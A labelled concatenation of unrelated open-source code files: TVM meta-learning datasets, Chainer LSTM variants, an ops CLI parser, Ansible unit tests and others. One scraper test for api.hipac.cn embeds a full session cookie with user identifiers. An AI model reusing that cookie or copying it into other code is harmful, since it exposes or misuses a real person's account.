                _list.extend(random.sample(range(way * 100, self.__cost_len), shot))
            else:
                _list.extend(random.sample(range(way * 100, (way + 1) * 100), shot))
        return np.array(_list)

    def __getitem__(self, idx):
        batch = dict()
        ways = np.array(random.sample(range(self.__n_task), self.ways))
        candidate = self.candidate(ways, self.shot)
        train_data = np.take(self.__features, candidate, axis=0)
        train_label = np.take(self.__costs, candidate, axis=0)
        candidate = self.candidate(ways, self.test_shot)
        test_data = np.take(self.__features, candidate, axis=0)
        test_label = np.take(self.__costs, candidate, axis=0)
        train_data = torch.tensor(train_data, dtype=torch.float32)
        test_data = torch.tensor(test_data, dtype=torch.float32)
        train_label = torch.tensor(train_label, dtype=torch.float32)
        test_label = torch.tensor(test_label, dtype=torch.float32)
        batch['train'] = (train_data, train_label)
        batch['test'] = (test_data, test_label)
        return batch
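A minimal standalone sketch (names are illustrative, not part of the repo) of the 100-point "task" chunking that `GraphDataset.candidate` performs: each task is one chunk of up to 100 consecutive indices, and `shot` indices are drawn from each chosen chunk.

```python
import random
import numpy as np


def sample_chunk_indices(n_points, ways, shot, chunk=100, seed=0):
    """Pick `shot` random indices from each of `ways` randomly chosen chunks."""
    rng = random.Random(seed)
    n_task = int(np.ceil(n_points / chunk))
    chosen = rng.sample(range(n_task), ways)
    picked = []
    for way in chosen:
        # The last chunk may be shorter than `chunk` points.
        hi = n_points if way == n_task - 1 else (way + 1) * chunk
        picked.extend(rng.sample(range(way * chunk, hi), shot))
    return np.array(picked)


idx = sample_chunk_indices(n_points=250, ways=2, shot=5)
```

With 250 points this yields 3 chunks (0-99, 100-199, 200-249); the result is a flat array of `ways * shot` indices.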
class GraphBatchDataset(Dataset):

    def __init__(self, ways=5, shot=5, test_shot=5, size=10000000, transform=None, val=False,
                 tasks=('conv1d', 'conv1d_transpose', 'conv2d', 'conv2d_winograd', 'conv2d_transpose'),
                 template=False, sample=False, feature_size=128):
        self.shot = shot
        self.ways = ways
        self.test_shot = test_shot
        self.__save_path = '/root/incubator-tvm/result/2020_10_30'
        self.transform = transform
        self.__tasks = tasks
        if val:
            self.__tasks = ['conv2d', 'conv2d_winograd', 'conv2d_transpose']
        path = os.path.join(self.__save_path, 'all')
        if template:
            path_prefix = os.path.join(path, f'template/{feature_size}')
        else:
            path_prefix = os.path.join(path, f'non-template/{feature_size}')
        if sample:
            path_prefix = os.path.join(path_prefix, 'sample')
        else:
            path_prefix = os.path.join(path_prefix, 'full')
        paths = []
        for p in self.__tasks:
            paths.extend(glob.glob(os.path.join(path_prefix, 'new_data', p, '*', '[0-9]*')))
        self.__cost_path = list(map(lambda x: os.path.join(x, 'label.npy'), paths))
        self.__feature_path = list(map(lambda x: os.path.join(x, 'batch_1.npy'), paths))
        self._feature = []
        for fea in self.__feature_path:
            self._feature.append(np.load(fea))
        self._cost = []
        for cost in self.__cost_path:
            self._cost.append(np.load(cost))
        self.__n_task = len(self.__cost_path)

    def __len__(self):
        return len(self._feature) * 20 * self.shot * self.ways

    def candidate(self, ways, shot):
        selection = [self._feature[index] for index in ways]
        candidate = [random.sample(range(i.shape[0]), shot) for i in selection]
        return np.array(candidate)

    def __getitem__(self, idx):
        batch = dict()
        ways = np.array(random.sample(range(self.__n_task), self.ways))
        candidate = self.candidate(ways, self.shot)
        train_data = np.take(self._feature, candidate, axis=0)
        train_label = np.take(self._cost, candidate, axis=0)
        candidate = self.candidate(ways, self.test_shot)
        test_data = np.take(self._feature, candidate, axis=0)
        test_label = np.take(self._cost, candidate, axis=0)
        train_data = torch.tensor(train_data, dtype=torch.float32)
        test_data = torch.tensor(test_data, dtype=torch.float32)
        train_label = torch.tensor(train_label, dtype=torch.float32)
        test_label = torch.tensor(test_label, dtype=torch.float32)
        batch['train'] = (train_data, train_label)
        batch['test'] = (test_data, test_label)
        return batch
class Conv2dGraphBatchDataset(Dataset):

    def __init__(self, ways=5, shot=5, test_shot=5, size=10000000, transform=None, val=False,
                 tasks='conv2d_mix', template=False, sample=False, feature_size=128):
        self.shot = shot
        self.ways = ways
        self.test_shot = test_shot
        self.__save_path = '/root/incubator-tvm/result/2020_10_30'
        self.transform = transform
        self.__tasks = tasks
        if val:
            self.__tasks = ['conv2d', 'conv2d_winograd', 'conv2d_transpose']
        path = os.path.join(self.__save_path, f'{tasks}')
        if template:
            path_prefix = os.path.join(path, f'template/{feature_size}')
        else:
            path_prefix = os.path.join(path, f'non-template/{feature_size}')
        if sample:
            path_prefix = os.path.join(path_prefix, 'sample')
        else:
            path_prefix = os.path.join(path_prefix, 'full')
        if val:
            paths = []
            for p in self.__tasks:
                paths.extend(glob.glob(os.path.join(path_prefix, 'new_data', p, '*', '[0-9]*')))
        else:
            if tasks == 'conv2d_mix':
                paths = glob.glob(os.path.join(path_prefix, 'new_data', '*', '*_[0-9]', '[0-9]*'), recursive=True)
            else:
                paths = glob.glob(os.path.join(path_prefix, 'new_data', '*', '*', '[0-9]*'), recursive=True)
        self.__cost_path = list(map(lambda x: os.path.join(x, 'label.npy'), paths))
        self.__feature_path = list(map(lambda x: os.path.join(x, 'batch_1.npy'), paths))
        self._feature = []
        for fea in self.__feature_path:
            self._feature.append(np.load(fea))
        print(len(self._feature))
        self._cost = []
        for cost in self.__cost_path:
            self._cost.append(np.load(cost))
        self.__n_task = len(self.__cost_path)

    def __len__(self):
        return len(self._feature) * 20 * self.shot * self.ways

    def candidate(self, ways, shot):
        selection = [self._feature[index] for index in ways]
        candidate = [random.sample(range(i.shape[0]), shot) for i in selection]
        return np.array(candidate)

    def __getitem__(self, idx):
        batch = dict()
        ways = np.array(random.sample(range(self.__n_task), self.ways))
        candidate = self.candidate(ways, self.shot)
        train_data = np.take(self._feature, candidate, axis=0)
        train_label = np.take(self._cost, candidate, axis=0)
        candidate = self.candidate(ways, self.test_shot)
        test_data = np.take(self._feature, candidate, axis=0)
        test_label = np.take(self._cost, candidate, axis=0)
        train_data = torch.tensor(train_data, dtype=torch.float32)
        test_data = torch.tensor(test_data, dtype=torch.float32)
        train_label = torch.tensor(train_label, dtype=torch.float32)
        test_label = torch.tensor(test_label, dtype=torch.float32)
        batch['train'] = (train_data, train_label)
        batch['test'] = (test_data, test_label)
        return batch
# ---- test/deps.bzl (meteorcloudy/rules_rust, Apache-2.0) ----
"""A module defining dependencies of the `io_bazel_rules_rust` tests"""
load("//test/load_arbitrary_tool:load_arbitrary_tool_test.bzl", "load_arbitrary_tool_test")

def io_bazel_rules_rust_test_deps():
    """Load dependencies for io_bazel_rules_rust tests"""
    load_arbitrary_tool_test()
# ---- main.py (francisbeboy/User_generator, MIT) ----
from user import get_users
print(get_users(10))
# ---- HipacSpider/test.py (futheads/ScrapyProject, Apache-2.0) ----
import requests
if __name__ == '__main__':
    url = 'https://api.hipac.cn/process/prod/1.0.2/mall.item.searchItemListWithFlashBuyAct.pc/?' \
          'appKey=1300&os=Chrome&t=1553848122455&sign=bd80c6d8138d464bf36b6e7bef78f7de' \
          '&data={"pageNo":1,"pageSize":20,"sortType":"3","itemSearchTypes":"","searchSource":"cate"}'
    headers = dict()
    headers["Cookie"] = "acw_tc=2f624a3515525447331993547e61488470c932a13415163c14a7d1b308a802; uid=3a174da55e814f19a088f57b53cf611a; df=1f3fe8ed63ad88558e8c516f85b26a20-1697ae097cd_tongdun; yduss_production=M6zhthVOv904OhWpFYuNLJjk-Pp6ZAbwDQscSIN_eNs0uBdq5o8JkDS3WvOXPhvo18IPHuUW43slhaE5RMC2AgbP_iNT01tYb18w-3HPAAmxS2mbySuIPJTKR9uQ721q_A1xvprE73TuqUOEegTrRzX9leKeNvEMeoxvjJ3Z7U26ELiggXYM-W3KPBWGO9rptue_RgeeGwYlL37ZfLxDmr0cNrtMc_w_4JicN7nWstAcTYjIcMoPN-tP5QLWu5aouv_9XEvFmk6zB4CAq78q2kMm5jVvbS3VlUxaFzf1qxKY4O3edYxG1BkSMpM9alFpyM78kIX8kohBc6LHhmg7FxLNYDe9qTx9aXcCKFrTBB0l4AbjiqQXQ4xO65pu7cm5iI6MTbWhD0EpUOhjYKWPa9USed1ZWxbsCED5qYIrSqGFqa8oBAjyLxRUD00IIXCsJfg1zZ8WAPjT0fP0m2Mq3PxlC2UzrWoq-rFmQQw0FJfcfSJ1pzCo0iR1-zGodoSYrUqO8jGkJ76wKyTbdAyhLXJBb4wHr-L1bzksaLJYD4Uj9oqYjEtyg-JYPjQiLkcm3sJzIOYiU6g.; hipac.cn_USERID=3a174da55e814f19a088f57b53cf611a; hipac.cn_LASTLOGINTIME=1553848111526; hipac.cnuser_uuid=ebce1d6a-a47c-4016-90e6-b00d028da5cc; SERVERID=703df12c9070c5b89b89c38696dbd8d2|1553852284|1553848070"
    headers["User-Agent"] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"
    headers["Host"] = "api.hipac.cn"
    print(requests.get(url, headers=headers).json())
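The query string above is concatenated by hand. A hypothetical alternative (not from the original script) builds the same kind of query with the standard library's `urlencode`, which also handles percent-encoding:

```python
from urllib.parse import urlencode

# Illustrative subset of the request parameters; dict insertion order is
# preserved in the encoded output.
params = {
    "appKey": "1300",
    "os": "Chrome",
    "t": "1553848122455",
}
query = urlencode(params)
full_url = "https://api.hipac.cn/process/prod/1.0.2/mall.item.searchItemListWithFlashBuyAct.pc/?" + query
```

With `requests`, the same effect is usually achieved by passing the dict as `params=` instead of appending it to the URL.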
# ---- object_publisher/__init__.py (seagetch/object_publisher, MIT) ----
from object_publisher.base import publish
from object_publisher.cli import CLI
from object_publisher.flask import Flask
# ---- modules/cli/runcli.py (serchaofan/oakleaf, Apache-2.0) ----
import argparse
from modules import get, run


def parser_ping_options(parser):
    parser.add_argument("-g", "--group", help="Ping Hosts in Group")
    parser.add_argument("-H", "--host", help="Ping Single Host")
    parser.add_argument("-A", "--all", action="store_true", help="Ping All Hosts")
    parser.set_defaults(func=run.run_ping)


def parser_command_options(parser):
    parser.add_argument("-g", "--group")
    parser.add_argument("-A", "--all", action="store_true")
    parser.add_argument("-H", "--host")
    parser.add_argument("command", nargs=argparse.REMAINDER)
    parser.set_defaults(func=run.run_command)


def parser_script_options(parser):
    parser.add_argument("-g", "--group")
    parser.add_argument("-H", "--host")
    parser.add_argument("-A", "--all", action="store_true")
    parser.add_argument("-f", "--file", required=True)
    parser.add_argument("-a", "--argv", nargs=argparse.REMAINDER)
    parser.set_defaults(func=run.run_script)


def parser_copy_options(parser):
    parser.add_argument("-g", "--group")
    parser.add_argument("-H", "--host")
    parser.add_argument("-A", "--all", action="store_true")
    parser.add_argument("-f", "--file", required=True)
    parser.add_argument("-d", "--dest")
    parser.add_argument("-o", "--owner")
    parser.add_argument("-p", "--perm")
    parser.set_defaults(func=run.run_copy)


def parser_file_options(parser):
    parser.add_argument("-g", "--group")
    parser.add_argument("-H", "--host")
    parser.add_argument("-A", "--all", action="store_true")
    parser.add_argument("-r", action="store_true")
    parser.add_argument("-f", "--file", required=True)
    parser.add_argument("-o", "--owner")
    parser.add_argument("-p", "--perm")
    parser.set_defaults(func=run.run_file)


def parser_sysinfo_options(parser):
    parser.add_argument("-g", "--group")
    parser.add_argument("-H", "--host")
    parser.add_argument("-A", "--all", action="store_true")
    parser.set_defaults(func=run.run_sysinfo)


def parser_loadinfo_options(parser):
    parser.add_argument("-g", "--group")
    parser.add_argument("-H", "--host")
    parser.add_argument("-A", "--all", action="store_true")
    parser.set_defaults(func=run.run_loadinfo)


def parser_chpass_options(parser):
    parser.add_argument("-g", "--group")
    parser.add_argument("-H", "--host")
    parser.add_argument("-u", "--user", required=True)
    parser.add_argument("-p", "--passwd", required=True)
    parser.set_defaults(func=run.run_chpass)


def parser_download_options(parser):
    parser.add_argument("-g", "--group")
    parser.add_argument("-H", "--host")
    parser.add_argument("-A", "--all", action="store_true")
    parser.add_argument("--url", required=True)
    parser.set_defaults(func=run.run_download)


# ---- chainer-1.5/LSTMVariants.py (ysadamori/chainer_LSTM_seq2seq_example, MIT) ----
import numpy
import chainer
from chainer.functions.activation import sigmoid
from chainer.functions.activation import tanh
from chainer import link
from chainer.links.connection import linear


class LSTMBase(link.Chain):

    def __init__(self, n_units, n_inputs=None):
        if n_inputs is None:
            n_inputs = n_units
        super(LSTMBase, self).__init__(
            W_fh=linear.Linear(n_inputs, n_units),
            W_ih=linear.Linear(n_inputs, n_units),
            W_oh=linear.Linear(n_inputs, n_units),
            W_ch=linear.Linear(n_inputs, n_units),
            W_fx=linear.Linear(n_inputs, n_units),
            W_ix=linear.Linear(n_inputs, n_units),
            W_ox=linear.Linear(n_inputs, n_units),
            W_cx=linear.Linear(n_inputs, n_units),
        )
class CoupledForgetLSTMBase(link.Chain):

    def __init__(self, n_units, n_inputs=None):
        if n_inputs is None:
            n_inputs = n_units
        super(CoupledForgetLSTMBase, self).__init__(
            W_fh=linear.Linear(n_inputs, n_units),
            W_oh=linear.Linear(n_inputs, n_units),
            W_ch=linear.Linear(n_inputs, n_units),
            W_fx=linear.Linear(n_inputs, n_units),
            W_ox=linear.Linear(n_inputs, n_units),
            W_cx=linear.Linear(n_inputs, n_units),
        )
class PeepHoleLSTMBase(link.Chain):

    def __init__(self, n_units, n_inputs=None):
        if n_inputs is None:
            n_inputs = n_units
        super(PeepHoleLSTMBase, self).__init__(
            W_fh=linear.Linear(n_inputs, n_units),
            W_fc=linear.Linear(n_inputs, n_units),
            W_ih=linear.Linear(n_inputs, n_units),
            W_ic=linear.Linear(n_inputs, n_units),
            W_oh=linear.Linear(n_inputs, n_units),
            W_oc=linear.Linear(n_inputs, n_units),
            W_ch=linear.Linear(n_inputs, n_units),
            W_fx=linear.Linear(n_inputs, n_units),
            W_ix=linear.Linear(n_inputs, n_units),
            W_ox=linear.Linear(n_inputs, n_units),
            W_cx=linear.Linear(n_inputs, n_units),
        )
class CoupledForgetPeepHoleLSTMBase(link.Chain):

    def __init__(self, n_units, n_inputs=None):
        if n_inputs is None:
            n_inputs = n_units
        super(CoupledForgetPeepHoleLSTMBase, self).__init__(
            W_fh=linear.Linear(n_inputs, n_units),
            W_fc=linear.Linear(n_inputs, n_units),
            W_oh=linear.Linear(n_inputs, n_units),
            W_oc=linear.Linear(n_inputs, n_units),
            W_ch=linear.Linear(n_inputs, n_units),
            W_fx=linear.Linear(n_inputs, n_units),
            W_ox=linear.Linear(n_inputs, n_units),
            W_cx=linear.Linear(n_inputs, n_units),
        )
class StatefulLSTM(LSTMBase):

    def __init__(self, in_size, out_size):
        super(StatefulLSTM, self).__init__(out_size, in_size)
        self.state_size = out_size
        self.reset_state()

    def to_cpu(self):
        super(StatefulLSTM, self).to_cpu()
        if self.h is not None:
            self.h.to_cpu()
        if self.c is not None:
            self.c.to_cpu()

    def to_gpu(self, device=None):
        super(StatefulLSTM, self).to_gpu(device)
        if self.c is not None:
            self.c.to_gpu(device)
        if self.h is not None:
            self.h.to_gpu(device)

    def set_state(self, h, c):
        assert isinstance(h, chainer.Variable)
        assert isinstance(c, chainer.Variable)
        h_ = h
        c_ = c
        if self.xp == numpy:
            h_.to_cpu()
            c_.to_cpu()
        else:
            h_.to_gpu()
            c_.to_gpu()
        self.h = h_
        self.c = c_

    def reset_state(self):
        self.h = None
        self.c = None

    def __call__(self, x):
        ft = self.W_fx(x)
        it = self.W_ix(x)
        ct = self.W_cx(x)
        ot = self.W_ox(x)
        if self.h is not None:
            ft += self.W_fh(self.h)
            it += self.W_ih(self.h)
            ct += self.W_ch(self.h)
            ot += self.W_oh(self.h)
        ft = sigmoid.sigmoid(ft)
        it = sigmoid.sigmoid(it)
        ct = tanh.tanh(ct)
        ot = sigmoid.sigmoid(ot)
        c = it * ct
        if self.c is not None:
            c += ft * self.c
        self.c = c
        self.h = ot * tanh.tanh(self.c)
        return self.h

    def get_state(self):
        return self.c
class StatelessLSTM(LSTMBase):

    def __init__(self, in_size, out_size):
        super(StatelessLSTM, self).__init__(out_size, in_size)
        self.state_size = out_size

    def __call__(self, x, h, c):
        ft = sigmoid.sigmoid(self.W_fx(x) + self.W_fh(h))
        it = sigmoid.sigmoid(self.W_ix(x) + self.W_ih(h))
        ct = tanh.tanh(self.W_cx(x) + self.W_ch(h))
        ot = sigmoid.sigmoid(self.W_ox(x) + self.W_oh(h))
        c = ft * c + it * ct
        h = ot * tanh.tanh(c)
        return h, c
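The gate equations that StatelessLSTM implements can be checked with a small NumPy-only sketch (standalone illustration; weight names mirror the class but are otherwise arbitrary):

```python
import numpy as np


def sigmoid(z):
    return 1.0 / (1.0 + np.exp(-z))


def lstm_step(x, h, c, W):
    """One plain LSTM step: f, i, o gates plus the tanh candidate."""
    f = sigmoid(x @ W['fx'] + h @ W['fh'])
    i = sigmoid(x @ W['ix'] + h @ W['ih'])
    g = np.tanh(x @ W['cx'] + h @ W['ch'])
    o = sigmoid(x @ W['ox'] + h @ W['oh'])
    c_new = f * c + i * g
    h_new = o * np.tanh(c_new)
    return h_new, c_new


rng = np.random.default_rng(0)
n_in, n_units = 3, 4
W = {k: rng.standard_normal((n_in if k.endswith('x') else n_units, n_units))
     for k in ['fx', 'fh', 'ix', 'ih', 'cx', 'ch', 'ox', 'oh']}
h, c = lstm_step(rng.standard_normal((2, n_in)),
                 np.zeros((2, n_units)), np.zeros((2, n_units)), W)
```

Because `h = o * tanh(c)` with `o` in (0, 1) and `|tanh| < 1`, the hidden state stays strictly inside (-1, 1).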
class StatefulPeepHoleLSTM(PeepHoleLSTMBase):

    def __init__(self, in_size, out_size):
        super(StatefulPeepHoleLSTM, self).__init__(out_size, in_size)
        self.state_size = out_size
        self.reset_state()

    def to_cpu(self):
        super(StatefulPeepHoleLSTM, self).to_cpu()
        if self.h is not None:
            self.h.to_cpu()
        if self.c is not None:
            self.c.to_cpu()

    def to_gpu(self, device=None):
        super(StatefulPeepHoleLSTM, self).to_gpu(device)
        if self.c is not None:
            self.c.to_gpu(device)
        if self.h is not None:
            self.h.to_gpu(device)

    def set_state(self, h, c):
        assert isinstance(h, chainer.Variable)
        assert isinstance(c, chainer.Variable)
        h_ = h
        c_ = c
        if self.xp == numpy:
            h_.to_cpu()
            c_.to_cpu()
        else:
            h_.to_gpu()
            c_.to_gpu()
        self.h = h_
        self.c = c_

    def reset_state(self):
        self.h = None
        self.c = None

    def __call__(self, x):
        ft = self.W_fx(x)
        it = self.W_ix(x)
        ct = self.W_cx(x)
        ot = self.W_ox(x)
        if self.h is not None and self.c is not None:
            ft += self.W_fh(self.h) + self.W_fc(self.c)
            it += self.W_ih(self.h) + self.W_ic(self.c)
            ct += self.W_ch(self.h)
            ot += self.W_oh(self.h)
        ft = sigmoid.sigmoid(ft)
        it = sigmoid.sigmoid(it)
        ct = tanh.tanh(ct)
        c = it * ct
        if self.c is not None:
            c += ft * self.c
        self.c = c
        # output gate peeps at the updated cell state
        ot = sigmoid.sigmoid(ot + self.W_oc(self.c))
        self.h = ot * tanh.tanh(self.c)
        return self.h

    def get_state(self):
        return self.c
class StatelessPeepHoleLSTM(PeepHoleLSTMBase):

    def __init__(self, in_size, out_size):
        super(StatelessPeepHoleLSTM, self).__init__(out_size, in_size)
        self.state_size = out_size

    def __call__(self, x, h, c):
        ft = sigmoid.sigmoid(self.W_fx(x) + self.W_fh(h) + self.W_fc(c))
        it = sigmoid.sigmoid(self.W_ix(x) + self.W_ih(h) + self.W_ic(c))
        ct = tanh.tanh(self.W_cx(x) + self.W_ch(h))
        c = ft * c + it * ct
        ot = sigmoid.sigmoid(self.W_ox(x) + self.W_oh(h) + self.W_oc(c))
        h = ot * tanh.tanh(c)
        return h, c
class CoupledForgetStatefulLSTM(CoupledForgetLSTMBase):

    def __init__(self, in_size, out_size):
        super(CoupledForgetStatefulLSTM, self).__init__(out_size, in_size)
        self.state_size = out_size
        self.reset_state()

    def to_cpu(self):
        super(CoupledForgetStatefulLSTM, self).to_cpu()
        if self.h is not None:
            self.h.to_cpu()
        if self.c is not None:
            self.c.to_cpu()

    def to_gpu(self, device=None):
        super(CoupledForgetStatefulLSTM, self).to_gpu(device)
        if self.c is not None:
            self.c.to_gpu(device)
        if self.h is not None:
            self.h.to_gpu(device)

    def set_state(self, h, c):
        assert isinstance(h, chainer.Variable)
        assert isinstance(c, chainer.Variable)
        h_ = h
        c_ = c
        if self.xp == numpy:
            h_.to_cpu()
            c_.to_cpu()
        else:
            h_.to_gpu()
            c_.to_gpu()
        self.h = h_
        self.c = c_

    def reset_state(self):
        self.h = None
        self.c = None

    def __call__(self, x):
        ft = self.W_fx(x)
        ct = self.W_cx(x)
        ot = self.W_ox(x)
        if self.h is not None:
            ft += self.W_fh(self.h)
            ct += self.W_ch(self.h)
            ot += self.W_oh(self.h)
        ft = sigmoid.sigmoid(ft)
        ct = tanh.tanh(ct)
        ot = sigmoid.sigmoid(ot)
        c = (1 - ft) * ct
        if self.c is not None:
            c += ft * self.c
        self.c = c
        self.h = ot * tanh.tanh(self.c)
        return self.h

    def get_state(self):
        return self.c
class CoupledForgetStatelessLSTM(CoupledForgetLSTMBase):

    def __init__(self, in_size, out_size):
        super(CoupledForgetStatelessLSTM, self).__init__(out_size, in_size)
        self.state_size = out_size

    def __call__(self, x, h, c):
        ft = sigmoid.sigmoid(self.W_fx(x) + self.W_fh(h))
        ct = tanh.tanh(self.W_cx(x) + self.W_ch(h))
        ot = sigmoid.sigmoid(self.W_ox(x) + self.W_oh(h))
        c = ft * c + (1 - ft) * ct
        h = ot * tanh.tanh(c)
        return h, c
class CoupledForgetStatefulPeepHoleLSTM(CoupledForgetPeepHoleLSTMBase):

    def __init__(self, in_size, out_size):
        super(CoupledForgetStatefulPeepHoleLSTM, self).__init__(out_size, in_size)
        self.state_size = out_size
        self.reset_state()

    def to_cpu(self):
        super(CoupledForgetStatefulPeepHoleLSTM, self).to_cpu()
        if self.h is not None:
            self.h.to_cpu()
        if self.c is not None:
            self.c.to_cpu()

    def to_gpu(self, device=None):
        super(CoupledForgetStatefulPeepHoleLSTM, self).to_gpu(device)
        if self.c is not None:
            self.c.to_gpu(device)
        if self.h is not None:
            self.h.to_gpu(device)

    def set_state(self, h, c):
        assert isinstance(h, chainer.Variable)
        assert isinstance(c, chainer.Variable)
        h_ = h
        c_ = c
        if self.xp == numpy:
            h_.to_cpu()
            c_.to_cpu()
        else:
            h_.to_gpu()
            c_.to_gpu()
        self.h = h_
        self.c = c_

    def reset_state(self):
        self.h = None
        self.c = None

    def __call__(self, x):
        ft = self.W_fx(x)
        ct = self.W_cx(x)
        ot = self.W_ox(x)
        if self.h is not None and self.c is not None:
            ft += self.W_fh(self.h) + self.W_fc(self.c)
            ct += self.W_ch(self.h)
            ot += self.W_oh(self.h)
        ft = sigmoid.sigmoid(ft)
        ct = tanh.tanh(ct)
        ot = sigmoid.sigmoid(ot + self.W_oc(ct))
        # coupled update: c_t = f_t * c_{t-1} + (1 - f_t) * c~_t (skip the
        # previous-cell term on the first step, when self.c is None)
        c = (1 - ft) * ct
        if self.c is not None:
            c += ft * self.c
        self.c = c
        self.h = ot * tanh.tanh(self.c)
        return self.h

    def get_state(self):
        return self.c
class CoupledForgetStatelessPeepHoleLSTM(CoupledForgetPeepHoleLSTMBase):

    def __init__(self, in_size, out_size):
        super(CoupledForgetStatelessPeepHoleLSTM, self).__init__(out_size, in_size)
        self.state_size = out_size

    def __call__(self, x, h, c):
        ft = sigmoid.sigmoid(self.W_fx(x) + self.W_fh(h) + self.W_fc(c))
        ct = tanh.tanh(self.W_cx(x) + self.W_ch(h))
        c = ft * c + (1 - ft) * ct
        ot = sigmoid.sigmoid(self.W_ox(x) + self.W_oh(h) + self.W_oc(c))
        h = ot * tanh.tanh(c)
        return h, c
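# The coupled-forget variants above fold the input gate into the forget gate
# (input gate = 1 - f). A minimal NumPy sketch of that cell update follows; the
# weight dict W, the standalone sigmoid, and coupled_forget_step are
# hypothetical illustrations, not the chainer Links used by the classes above.

```python
import numpy as np


def sigmoid(x):
    return 1.0 / (1.0 + np.exp(-x))


def coupled_forget_step(x, h_prev, c_prev, W):
    # Forget gate f doubles as the (coupled) input gate 1 - f.
    f = sigmoid(W["fx"] @ x + W["fh"] @ h_prev)
    c_tilde = np.tanh(W["cx"] @ x + W["ch"] @ h_prev)
    o = sigmoid(W["ox"] @ x + W["oh"] @ h_prev)
    c = f * c_prev + (1.0 - f) * c_tilde   # convex combination of old and new
    h = o * np.tanh(c)
    return h, c


rng = np.random.default_rng(0)
n_in, n_out = 3, 2
# *x weights map inputs, *h weights map the recurrent hidden state.
W = {k: rng.standard_normal((n_out, n_in if k.endswith("x") else n_out))
     for k in ("fx", "fh", "cx", "ch", "ox", "oh")}
h = c = np.zeros(n_out)
for _ in range(4):
    h, c = coupled_forget_step(rng.standard_normal(n_in), h, c, W)
```

# Because c is a convex combination of the previous cell and tanh output, the
# cell state stays bounded in [-1, 1] without a separate input gate.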
# === code/mean_std.py — repo: xuan525/COM3240-Supervised-Learning-Assignment (MIT) ===
import csv
import numpy as np

print('num_neuron')
print('x,y,std')
for n_neuron in [10, 50, 100, 150, 250, 400, 800]:
    test_accs = []
    for i in range(0, 10):
        f_name = './log/num_neuron/{}.{}.csv'.format(n_neuron, i)
        with open(f_name, 'r') as csvfile:
            reader = csv.reader(csvfile)
            rows = [row for row in reader]
            testrow = rows[-1]
            test_acc = testrow[6]
            test_accs.append(test_acc)
    # np.float is removed in modern NumPy; the builtin float is equivalent here
    test_accs = np.array(test_accs, dtype=float)
    mean = np.mean(test_accs)
    std = np.std(test_accs)
    print('{},{},{}'.format(n_neuron, mean, std))
print()

print('deep_layer')
print('x,y,std')
for n_neuron in [10, 50, 100, 150, 250, 400, 800]:
    test_accs = []
    for i in range(0, 10):
        f_name = './log/deep_layer/{}.{}.csv'.format(n_neuron, i)
        with open(f_name, 'r') as csvfile:
            reader = csv.reader(csvfile)
            rows = [row for row in reader]
            testrow = rows[-1]
            test_acc = testrow[6]
            test_accs.append(test_acc)
    test_accs = np.array(test_accs, dtype=float)
    mean = np.mean(test_accs)
    std = np.std(test_accs)
    print('{},{},{}'.format(n_neuron, mean, std))
print()
# === venv/lib/python3.6/site-packages/ansible_collections/netapp/cloudmanager/tests/unit/plugins/modules/test_na_cloudmanager_cvo_azure.py — repo: usegalaxy-no/usegalaxy (MIT) ===
# (c) 2021, NetApp, Inc
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
''' unit tests Cloudmanager Ansible module: '''
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import json
import pytest
from ansible.module_utils import basic
from ansible.module_utils._text import to_bytes
from ansible_collections.netapp.cloudmanager.tests.unit.compat import unittest
from ansible_collections.netapp.cloudmanager.tests.unit.compat.mock import patch, Mock
from ansible_collections.netapp.cloudmanager.plugins.modules.na_cloudmanager_cvo_azure \
    import NetAppCloudManagerCVOAZURE as my_module
def set_module_args(args):
    '''prepare arguments so that they will be picked up during module creation'''
    args = json.dumps({'ANSIBLE_MODULE_ARGS': args})
    basic._ANSIBLE_ARGS = to_bytes(args)  # pylint: disable=protected-access


class AnsibleExitJson(Exception):
    '''Exception class to be raised by module.exit_json and caught by the test case'''


class AnsibleFailJson(Exception):
    '''Exception class to be raised by module.fail_json and caught by the test case'''


def exit_json(*args, **kwargs):  # pylint: disable=unused-argument
    '''function to patch over exit_json; package return data into an exception'''
    if 'changed' not in kwargs:
        kwargs['changed'] = False
    raise AnsibleExitJson(kwargs)


def fail_json(*args, **kwargs):  # pylint: disable=unused-argument
    '''function to patch over fail_json; package return data into an exception'''
    kwargs['failed'] = True
    raise AnsibleFailJson(kwargs)


class MockCMConnection():
    ''' Mock response of http connections '''

    def __init__(self, kind=None, parm1=None):
        self.type = kind
        self.parm1 = parm1
        # self.token_type, self.token = self.get_token()
class TestMyModule(unittest.TestCase):
    ''' a group of related Unit Tests '''

    def setUp(self):
        self.mock_module_helper = patch.multiple(basic.AnsibleModule,
                                                 exit_json=exit_json,
                                                 fail_json=fail_json)
        self.mock_module_helper.start()
        self.addCleanup(self.mock_module_helper.stop)

    def set_default_args_pass_check(self):
        return dict({
            'state': 'present',
            'name': 'TestA',
            'client_id': 'test',
            'location': 'westus',
            'vnet_id': 'vpc-test',
            'resource_group': 'test',
            'subnet_id': 'subnet-test',
            'subscription_id': 'test',
            'cidr': '10.0.0.0/24',
            'svm_password': 'password',
            'refresh_token': 'myrefresh_token',
            'is_ha': False
        })

    def set_args_create_cloudmanager_cvo_azure(self):
        return dict({
            'state': 'present',
            'name': 'Dummyname',
            'client_id': 'test',
            'location': 'westus',
            'vnet_id': 'vpc-test',
            'resource_group': 'test',
            'subscription_id': 'test',
            'cidr': '10.0.0.0/24',
            'subnet_id': 'subnet-test',
            'svm_password': 'password',
            'refresh_token': 'myrefresh_token',
            'is_ha': False
        })

    def set_args_delete_cloudmanager_cvo_azure(self):
        return dict({
            'state': 'absent',
            'name': 'Dummyname',
            'client_id': 'test',
            'location': 'westus',
            'vnet_id': 'vpc-test',
            'resource_group': 'test',
            'subscription_id': 'test',
            'cidr': '10.0.0.0/24',
            'subnet_id': 'subnet-test',
            'svm_password': 'password',
            'refresh_token': 'myrefresh_token',
            'is_ha': False
        })
    def test_module_fail_when_required_args_missing(self):
        ''' required arguments are reported as errors '''
        with pytest.raises(AnsibleFailJson) as exc:
            set_module_args({})
            my_module()
        self.rest_api = MockCMConnection()
        print('Info: %s' % exc.value.args[0]['msg'])

    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp.CloudManagerRestAPI.get_token')
    def test_module_fail_when_required_args_present(self, get_token):
        ''' required arguments are reported as errors '''
        with pytest.raises(AnsibleExitJson) as exc:
            set_module_args(self.set_default_args_pass_check())
            get_token.return_value = 'test', 'test'
            my_module()
